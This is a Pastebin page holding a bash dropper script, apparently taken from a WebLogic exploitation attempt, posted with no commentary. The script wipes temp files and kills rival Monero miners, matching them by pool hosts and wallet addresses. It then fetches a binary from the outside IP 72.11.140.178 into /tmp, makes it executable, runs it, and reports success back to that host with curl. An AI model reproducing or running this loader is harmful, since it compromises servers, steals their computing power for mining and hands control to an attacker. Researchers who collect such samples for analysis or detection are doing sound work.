API tools faq
paste
Advertisement
thlnk3r

wls_vuln_attempt_72.11.140.178

thlnk3r
Jan 10th, 2018
436
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 4.94 KB | None | 0 0
raw download clone embed print report
  1. HOST=72.11.140.178
  2. CALLBACK=$HOST
  3.  
  4. DOWNLOADER="curl "
  5. # DOWNLOADER="wget -q -O - "
  6.  
  7. DEFAULT_RFILE=$HOST/files/l/default
  8. OTHERS_RFILE=$HOST/files/l/others
  9.  
  10. LFILE_NAME="infoed"
  11. # LFILE_PATH=`pwd`/$LFILE_NAME
  12. LFILE_PATH=/tmp/$LFILE_NAME
  13.  
  14. CLEAN ()
  15. {
  16. RMLIST=(/tmp/*index_bak* /tmp/*httpd.conf* /tmp/*httpd.conf /tmp/a7b104c270 /tmp/Carbon)
  17. KILIST=(AnXqV.yam zhuabcn@yahoo.com monerohash.com /tmp/a7b104c270 stratum.f2pool.com:8888 42HrCwmHSVyJSAQwn6Lifc3WWAWN56U8s2qAbm6BAagW6Ryh8JgWq8Q1JbZ8nXdcFVgnmAM3q86cm5y9xfmvV1ap6qVvmPe 4BrL51JCc9NGQ71kWhnYoDRffsDZy7m1HUU7MRU4nUMXAHNFBEJhkTZV9HdaL4gfuNBxLPc3BeMkLGaPbF5vWtANQt989KEfGRt6Ww2Xg8 46SDR76rJ2J6MtmP3ZZKi9cEA5RQCrYgag7La3CxEootQeAQULPE2CHJQ4MRZ5wZ1T73Kw6Kx4Lai2dFLAacjerbPzb5Ufg 42HrCwmHSVyJSAQwn6Lifc3WWAWN56U8s2qAbm6BAagW6Ryh8JgWq8Q1JbZ8nXdcFVgnmAM3q86cm5y9xfmvV1ap6qVvmPe xmrpool.eu mine.moneropool.com xmr.crypto-pool.fr:8080 xmr.crypto-pool.fr:3333 xmr.crypto-pool.fr:6666 xmr.crypto-pool.fr:7777 xmr.crypto-pool.fr:443)
  18. for item in ${RMLIST[@]}
  19. do
  20. rm -rf $item
  21. done
  22. for item in ${KILIST[@]}
  23. do
  24. ps auxf|grep -v grep|grep $item|awk '{print $2}'|xargs kill -9
  25. done
  26. days=$(($(date +%s) / 60 / 60 / 24))
  27. ps auxf|grep -v grep|grep "42HrCwmHSVyJSAQwn6Lifc3WWAWN56U8s2qAbm6BAagW6Ryh8JgWq8Q1JbZ8nXdcFVgnmAM3q86cm5y9xfmvV1ap6qVvmPe"|awk '{print $2}'|xargs kill -9
  28. ps auxf|grep -v grep|grep ${days}|awk '{print $2}'|xargs kill -9
  29. ps auxf|grep -v grep|grep "logind.conf"|awk '{print $2}'|xargs kill -9
  30. ps auxf|grep -v grep|grep "cryptonight"|awk '{print $2}'|xargs kill -9
  31. ps auxf|grep -v grep|grep "kworker"|awk '{print $2}'|xargs kill -9
  32. ps auxf|grep -v grep|grep "Silence"|awk '{print $2}'|xargs kill -9
  33. ps auxf|grep -v grep|grep "45hsTaSqTQM4K1Xeqkcy7eLzqdEuQ594fJVmQryCemQSCU878JGQdSDCxbhNyVjSkiaYat8yAfBuRTPSEUPZoARm9a5XEHZ"|awk '{print $2}'|xargs kill -9
  34. ps auxf|grep -v grep|grep "47sghzufGhJJDQEbScMCwVBimTuq6L5JiRixD8VeGbpjCTA12noXmi4ZyBZLc99e66NtnKff34fHsGRoyZk3ES1s1V4QVcB"|awk '{print $2}'|xargs kill -9
  35. ps auxf|grep -v grep|grep "44iuYecTjbVZ1QNwjWfJSZFCKMdceTEP5BBNp4qP35c53Uohu1G7tDmShX1TSmgeJr2e9mCw2q1oHHTC2boHfjkJMzdxumM"|awk '{print $2}'|xargs kill -9
  36. ps auxf|grep -v grep|grep "xmr.crypto-pool.fr"|awk '{print $2}'|xargs kill -9
  37. pkill -f 49hNrEaSKAx5FD8PE49Wa3DqCRp2ELYg8dSuqsiyLdzSehFfyvk4gDfSjTrPtGapqcfPVvMtAirgDJYMvbRJipaeTbzPQu4
  38. pkill -f 4AniF816tMCNedhQ4J3ccJayyL5ZvgnqQ4X9bK7qv4ZG3QmUfB9tkHk7HyEhh5HW6hCMSw5vtMkj6jSYcuhQTAR1Sbo15gB
  39. pkill -f 4813za7ePRV5TBce3NrSrugPPJTMFJmEMR9qiWn2Sx49JiZE14AmgRDXtvM1VFhqwG99Kcs9TfgzejAzT9Spm5ga5dkh8df
  40. pkill -f cpuloadtest
  41. pkill -f crypto-pool
  42. pkill -f xmr
  43. pkill -f prohash
  44. pkill -f monero
  45. pkill -f miner
  46. pkill -f nanopool
  47. pkill -f minergate
  48. pkill -f yam
  49. pkill -f Silence
  50. pkill -f yam2
  51. pkill -f minerd
  52. pkill -f Circle_MI.png
  53. pkill -f curl
  54. ps auxf|grep -v grep|grep "mine.moneropool.com"|awk '{print $2}'|xargs kill -9
  55. ps auxf|grep -v grep|grep "crypto-pool"|awk '{print $2}'|xargs kill -9
  56. ps auxf|grep -v grep|grep "prohash"|awk '{print $2}'|xargs kill -9
  57. ps auxf|grep -v grep|grep "monero"|awk '{print $2}'|xargs kill -9
  58. ps auxf|grep -v grep|grep "miner"|awk '{print $2}'|xargs kill -9
  59. ps auxf|grep -v grep|grep "nanopool"|awk '{print $2}'|xargs kill -9
  60. ps auxf|grep -v grep|grep "minergate"|awk '{print $2}'|xargs kill -9
  61. ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:8080"|awk '{print $2}'|xargs kill -9
  62. ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:3333"|awk '{print $2}'|xargs kill -9
  63. ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:443"|awk '{print $2}'|xargs kill -9
  64. ps auxf|grep -v grep|grep "zhuabcn@yahoo.com"|awk '{print $2}'|xargs kill -9
  65. ps auxf|grep -v grep|grep "stratum"|awk '{print $2}'|xargs kill -9
  66. ps auxf|grep -v grep|grep "44pgg5mYVH6Gnc7gKfWGPR2CxfQLhwdrCPJGzLonwrSt5CKSeEy6izyjEnRn114HTU7AWFTp1SMZ6eqQfvrdeGWzUdrADDu"|awk '{print $2}'|xargs kill -9
  67. ps auxf|grep -v grep|grep "42HrCwmHSVyJSAQwn6Lifc3WWAWN56U8s2qAbm6BAagW6Ryh8JgWq8Q1JbZ8nXdcFVgnmAM3q86cm5y9xfmvV1ap6qVvmPe"|awk '{print $2}'|xargs kill -9
  68. ps auxf|grep -v grep|grep "49JsSwt7MsH5m8DPRHXFSEit9ZTWZCbWwS7QSMUTcVuCgwAU24gni1ydnHdrT9QMibLtZ3spC7PjmEyUSypnmtAG7pyys7F"|awk '{print $2}'|xargs kill -9
  69. ps auxf|grep -v grep|grep "479MD1Emw69idbVNKPtigbej7x1ZwFR1G3boyXUFfAB89uk2AztaMdWVd6NzCTfZVpDReKEAsVVBwYpTG8fsRK3X17jcDKm"|awk '{print $2}'|xargs kill -9
  70. ps auxf|grep -v grep|grep "11231"|awk '{print $2}'|xargs kill -9
  71. }
  72.  
  73. DEFAULT ()
  74. {
  75. $DOWNLOADER $DEFAULT_RFILE > $LFILE_PATH
  76. chmod +x $LFILE_PATH
  77. ps -ef|grep $LFILE_NAME|grep -v grep
  78. if [ $? -ne 0 ]; then
  79. $LFILE_PATH -B && $DOWNLOADER "${CALLBACK}/?info=l60"
  80. else
  81. $DOWNLOADER "${CALLBACK}/?info=l69"
  82. fi
  83. }
  84.  
  85. OTHERS ()
  86. {
  87. $DOWNLOADER $OTHERS_RFILE > $LFILE_PATH
  88. chmod +x $LFILE_PATH
  89. ps -ef|grep $LFILE_NAME|grep -v grep
  90. if [ $? -ne 0 ]; then
  91. $LFILE_PATH -B && $DOWNLOADER "${CALLBACK}/?info=l30"
  92. else
  93. $DOWNLOADER "${CALLBACK}/?info=l39"
  94. fi
  95. }
  96.  
  97. CLEAN
  98. DEFAULT || OTHERS
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!